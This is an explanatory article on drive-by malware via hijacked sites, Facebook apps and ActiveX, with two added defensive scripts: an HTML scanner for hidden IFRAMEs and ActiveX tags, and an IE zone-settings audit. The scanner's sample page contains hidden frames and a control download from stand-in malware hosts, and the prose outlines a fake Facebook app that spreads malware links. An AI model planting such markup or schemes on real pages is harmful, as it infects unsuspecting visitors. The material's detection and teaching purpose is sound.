“Drive-by” infections are possible through browser and plug-in vulnerabilities, which malware creators take advantage of. A vulnerability is a software or hardware weakness that can be used to breach the security of a target computer. The web technologies most often exploited, i.e. taken advantage of, by malware are ActiveX, JavaScript, Java, HTML, CSS, images and the PDF format. Each of these can be a means of running arbitrary harmful code.
There have been cases where the hijacking of a legitimate, well-known website led to malware spreading to the users visiting the site:
The user clicks on the link to a legitimate URL that was hijacked by the cyber criminal for a few days or hours. Then an ActiveX control tests the vulnerability of the user’s browser. If it detects a vulnerability, the malware attacks; if not, it downloads a file, tests for another vulnerability, downloads other files, and so on. Each session of the traffic appears to be benign, but the combined activities become a coordinated attack.
Recently, with the growing popularity of social networking, a new and very fertile ground for malware breeders has emerged: Facebook. As in the real world, the higher the density of people per square meter, the higher the probability of contracting a contagious disease, and Facebook is no different. By allowing third-party developers to create applications rich in functionality and complexity, Facebook became a place where malware spreads.
Facebook applications are powerful scripts which have access to user account details and execute within the browser. Such a script can easily perform a malicious act such as, let’s say, sending a chat message with a link to all of the user’s friends who are online. Those who were not online would receive an email from the user in question inviting them to follow the link. The only trick would be to encourage a Facebook user to run the offered application by means of some seemingly interesting action the app performs, e.g. checking which of your friends visit your profile most often and giving an exact number. The numbers would be fake, the list taken from the profile and sorted randomly. The link, of course, would redirect whoever opened it to a malware-hosting server.
The ActiveX technology is an ideal means of planting malware on the casual website visitor’s computer. ActiveX controls are small programmes, similar to Java applets, that are required to view the content of some websites in Internet Explorer. Other Microsoft products like MS Office or Windows Media Player also use this technology, which fortunately gives the upper hand to those products or browsers which don’t use it. To meet the requirement, a user needs to agree to the installation after being prompted by a pop-up window or a warning bar at the top of Internet Explorer. It would be almost counter-intuitive not to install the required component to view the web page we want, wouldn’t it?
Installing an ActiveX component is no different from double-clicking on an unfamiliar .exe file. By agreeing to download and install such a component, a user actually runs an executable which, in the case of malware, either is the malware itself or will start a chain reaction that downloads and installs a number of malicious programmes from a malware-hosting location. Here is an example of the use of IFRAME, which I described in the previous article, in combination with ActiveX to install malware:
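From the defender's side, the two building blocks just described (a hidden IFRAME pulling in a loader page, and an `<object classid="clsid:...">` tag that makes Internet Explorer fetch and install a control) are easy to spot in the markup of a compromised page. The scanner below is an added example, not code from the original article: it walks an HTML document and reports zero-sized or `display:none` IFRAMEs (including frames nested inside a hidden ancestor) and ActiveX object tags, noting when a `codebase` attribute points at an installable package. The sample page and its `.invalid` hostnames are constructed for the example; the findings are triage signals, not verdicts, since legitimate pages also use hidden frames and well-known controls.

```python
"""Scan HTML for the drive-by building blocks described above.

Added example (not from the original article).  Flags hidden IFRAMEs and
<object classid="clsid:..."> ActiveX tags; a "codebase" attribute on the
object is what prompts IE to download and install the control.
"""
from html.parser import HTMLParser
import re

CLSID_RE = re.compile(
    r"^clsid:[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$",
    re.IGNORECASE,
)
ZERO_SIZE_RE = re.compile(r"^\s*0+(px)?\s*$")   # "0", "00", "0px"
VOID_TAGS = {"img", "br", "hr", "meta", "link", "input", "base", "param", "area", "col", "source"}


def _style_hides(style):
    """True if an inline style makes the element (and its children) invisible."""
    s = style.replace(" ", "").lower()
    if "display:none" in s or "visibility:hidden" in s:
        return True
    return re.search(r"(?:^|;)(?:width|height):0(?:px)?(?:;|$)", s) is not None


class DriveByScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (kind, detail) tuples
        self._stack = []     # (tag, hides_children) for currently open elements

    def _inside_hidden(self):
        return any(hidden for _, hidden in self._stack)

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}
        hides = _style_hides(a.get("style", ""))
        if tag == "iframe":
            zero = ZERO_SIZE_RE.match(a.get("width", "")) or ZERO_SIZE_RE.match(a.get("height", ""))
            if hides or zero or self._inside_hidden():
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "object" and CLSID_RE.match(a.get("classid", "")):
            kind = "activex_object_with_codebase" if a.get("codebase") else "activex_object"
            self.findings.append((kind, a["classid"]))
        if tag not in VOID_TAGS:
            self._stack.append((tag, hides))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; unclosed elements in between are dropped.
        while self._stack:
            if self._stack.pop()[0] == tag:
                break


def scan_html(html):
    """Return the list of (kind, detail) findings for one HTML document."""
    scanner = DriveByScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: one visible video frame, two hidden frames and one
# ActiveX object that asks IE to fetch and install a control from a .cab file.
SAMPLE_PAGE = """
<html><body>
<h1>Welcome</h1>
<iframe src="http://video.example/embed" width="640" height="360"></iframe>
<iframe src="http://malware-host.invalid/loader.html" width="0" height="0" frameborder="0"></iframe>
<object classid="clsid:00000000-0000-0000-0000-000000000001"
        codebase="http://malware-host.invalid/ctl.cab#version=1,0,0,0"></object>
<div style="display: none"><iframe src="http://malware-host.invalid/x.php"></iframe></div>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:30} {detail}")
```

Run against a page saved from a proxy log or a crawler, the scanner lists each suspicious element with its source URL or CLSID, which is enough to decide whether the frame target or the control's `codebase` host deserves a closer look.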
The worst scenario for infections using ActiveX is when a user changes their security settings after being “annoyed” by the security warnings. By doing this he or she actually places a big “Welcome!” sign at the doorstep of their system for all the ActiveX malware in the wild on the Internet, which will simply install at will whenever it is accidentally stumbled across.
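Whether a user has loosened those settings is visible in the Internet Explorer zone configuration. The audit script below is an added example, not part of the original article: it parses the text of a `.reg` export of the Internet zone key (`HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3`) and flags the ActiveX actions that are set more permissively than IE's default Medium-high level. The action IDs (1001, 1004, 1200, 1201) and their meanings are the documented zone settings; the baseline values and the two sample exports are stated in the code, and treating a missing value as "default applies" is an assumption of this example.

```python
"""Audit Internet zone ActiveX settings from a .reg export.

Added example (not from the original article).  Expected input is the text of
  reg export "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3" zone3.reg
(real exports are UTF-16 with a BOM; open them with encoding="utf-16").
"""
import re

ZONE3_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"

# Documented IE zone action IDs, as they appear as value names in the registry.
ACTIONS = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe for scripting",
}
ENABLE, PROMPT, DISABLE = 0, 1, 3           # lower number = more permissive
LEVEL = {ENABLE: "Enable", PROMPT: "Prompt", DISABLE: "Disable"}

# Baseline: IE's default Medium-high level for the Internet zone.
BASELINE = {"1001": PROMPT, "1004": DISABLE, "1200": ENABLE, "1201": DISABLE}

DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Return {key_path: {value_name: int}} for the dword values in a .reg export."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = DWORD_RE.match(line)
            if m:
                keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def audit_internet_zone(reg_text):
    """Return (action_id, description, observed, expected) for each weakened setting."""
    values = parse_reg_export(reg_text).get(ZONE3_KEY, {})
    findings = []
    for action, expected in BASELINE.items():
        observed = values.get(action, expected)   # assumption: absent value -> default applies
        if observed < expected:
            findings.append((action, ACTIONS[action],
                             LEVEL.get(observed, str(observed)), LEVEL[expected]))
    return findings


# Constructed sample: a user who set every ActiveX action to "Enable".
LOOSENED_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"1001"=dword:00000000
"1004"=dword:00000000
"1200"=dword:00000000
"1201"=dword:00000000
"""

# Constructed sample: the Medium-high defaults left untouched.
DEFAULT_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"1001"=dword:00000001
"1004"=dword:00000003
"1200"=dword:00000000
"1201"=dword:00000003
"""

if __name__ == "__main__":
    for action, desc, observed, expected in audit_internet_zone(LOOSENED_EXPORT):
        print(f"{action} {desc}: {observed} (expected {expected})")
```

Running it on a machine's export gives a short list of exactly which prompts the user silenced; in the loosened sample, unsigned-control download and scripting of unsafe controls are both turned on, which is the "install at will" state the paragraph warns about.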